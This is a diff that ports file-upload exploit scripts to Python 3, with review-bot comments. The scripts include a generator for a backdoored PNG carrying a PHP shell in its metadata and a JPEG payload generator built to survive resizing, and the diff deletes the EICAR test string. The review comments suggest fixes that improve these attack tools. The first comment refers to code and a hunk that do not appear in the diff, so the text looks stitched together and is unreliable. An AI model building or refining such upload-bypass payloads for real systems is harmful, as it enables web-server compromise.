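Review bot: `print("Woot! \m/")` contains `\m`, which is not a valid escape sequence; Python 3.6+ emits a `DeprecationWarning` for it and 3.12 a `SyntaxWarning`, so the port should write `print("Woot! \\m/")` or use a raw string. In the `@@ -143,11 +145,11 @@` hunk, `print("Getting initial offset...", end=' ')` is flushed only by the `sys.stdout.flush()` that comes after `getOffset` returns, so the progress text may not appear until the work is already done; moving the flush to the line right after that print fixes it. `main` starts above these hunks and continues between them.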
diff --git a/Upload insecure files/CVE Eicar/eicar.com.txt b/Upload insecure files/CVE Eicar/eicar.com.txt deleted file mode 100644 index a2463df..0000000 --- a/Upload insecure files/CVE Eicar/eicar.com.txt +++ /dev/null @@ -1 +0,0 @@ -X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* \ No newline at end of file diff --git a/Upload insecure files/CVE Ffmpeg HLS/gen_xbin_avi.py b/Upload insecure files/CVE Ffmpeg HLS/gen_xbin_avi.py index 8a758d8..db9726b 100755 --- a/Upload insecure files/CVE Ffmpeg HLS/gen_xbin_avi.py +++ b/Upload insecure files/CVE Ffmpeg HLS/gen_xbin_avi.py @@ -1,4 +1,8 @@ #!/usr/bin/env python3 +from builtins import bytes +from builtins import map +from builtins import zip +from builtins import range import struct import argparse import random diff --git a/Upload insecure files/Picture Metadata/Build_image_to_LFI.py b/Upload insecure files/Picture Metadata/Build_image_to_LFI.py index 2bef83f..bffc312 100755 --- a/Upload insecure files/Picture Metadata/Build_image_to_LFI.py +++ b/Upload insecure files/Picture Metadata/Build_image_to_LFI.py @@ -1,3 +1,4 @@ +from __future__ import print_function from PIL import Image # Shellcodes - Bypass included : Keyword Recognition : System, GET, php @@ -9,10 +10,10 @@ shellcode = "" shellcode2 = ";').($_^'/');?>" -print "\n[+] Advanced Upload - Shell inside metadatas of a PNG file" +print("\n[+] Advanced Upload - Shell inside metadatas of a PNG file") # Create a backdoored PNG -print " - Creating a payload.png" +print(" - Creating a payload.png") im = Image.new("RGB", (10,10), "Black") im.info["shell"] = shellcode reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect') 
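Review bot: The four `from builtins import ...` lines added to `gen_xbin_avi.py` are redundant: the file's shebang is `#!/usr/bin/env python3`, where `bytes`, `map`, `zip` and `range` are already the built-ins being imported. They look like the output of an automated Python 2-to-3 conversion pass (inferred from the pattern across this commit) and only add noise. I would drop them and leave the file starting with `import struct`.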
@@ -22,9 +23,9 @@ from PIL import PngImagePlugin meta = PngImagePlugin.PngInfo() # copy metadata into new object -for k,v in im.info.iteritems(): +for k,v in im.info.items(): if k in reserved: continue meta.add_text(k, v, 0) im.save("payload.png", "PNG", pnginfo=meta) -print "Done" \ No newline at end of file +print("Done") \ No newline at end of file diff --git a/Upload insecure files/Picture Resize/exploit_JPG.py b/Upload insecure files/Picture Resize/exploit_JPG.py index 77951db..14b8a09 100755 --- a/Upload insecure files/Picture Resize/exploit_JPG.py +++ b/Upload insecure files/Picture Resize/exploit_JPG.py @@ -20,10 +20,14 @@ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. """ +from __future__ import print_function +from future import standard_library +standard_library.install_aliases() +from builtins import range import struct,sys,os import gd -from StringIO import StringIO +from io import StringIO from random import randint,shuffle from time import time 
@@ -51,22 +55,22 @@ def insertPayload(_in, _out, payload,off): if __name__=='__main__': - print "[+] Virtualabs' Nasty bulletproof Jpeg generator" - print " | website: http://virtualabs.fr" - print " | contact: virtualabs -at- gmail -dot- com" - print "" + print("[+] Virtualabs' Nasty bulletproof Jpeg generator") + print(" | website: http://virtualabs.fr") + print(" | contact: virtualabs -at- gmail -dot- com") + print("") payloads = ["","","",""] # make sure the exploit-jpg directory exists or create it if os.path.exists('exploit-jpg') and not os.path.isdir('exploit-jpg'): - print "[!] Please remove the file named 'exploit-jpg' from the current directory" + print("[!] Please remove the file named 'exploit-jpg' from the current directory") elif not os.path.exists('exploit-jpg'): os.mkdir('exploit-jpg') # start generation - print '[i] Generating ...' - for q in range(50,100)+[-1]: + print('[i] Generating ...') + for q in list(range(50,100))+[-1]: # loop over every payload for p in payloads: # not done yet @@ -113,10 +117,10 @@ if __name__=='__main__': # does it contain our payload ? if p in final_raw: # Yay ! - print '[i] Jpeg quality %d ... DONE'%q + print('[i] Jpeg quality %d ... DONE'%q) done = True break - except IOError,e: + except IOError as e: pass else: break
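Review bot: When a regular file named `exploit-jpg` exists, the first branch only prints `[!] Please remove the file named 'exploit-jpg' from the current directory` and execution falls through to `# start generation`, where writes under that path will presumably fail. The branch should stop there; `sys` is imported at the top of the file, so adding `sys.exit(1)` after the message is enough. The `__main__` block continues past the end of this hunk.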
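Review bot: `except IOError as e: pass` binds `e` without using it and discards every I/O error from the `try` body, which starts above this hunk, so a quality level that failed is indistinguishable from one that simply did not match. Either drop the name (`except IOError:`) and add a comment saying why the error is ignored, or report it with `print('[!] quality %d: %s' % (q, e))`.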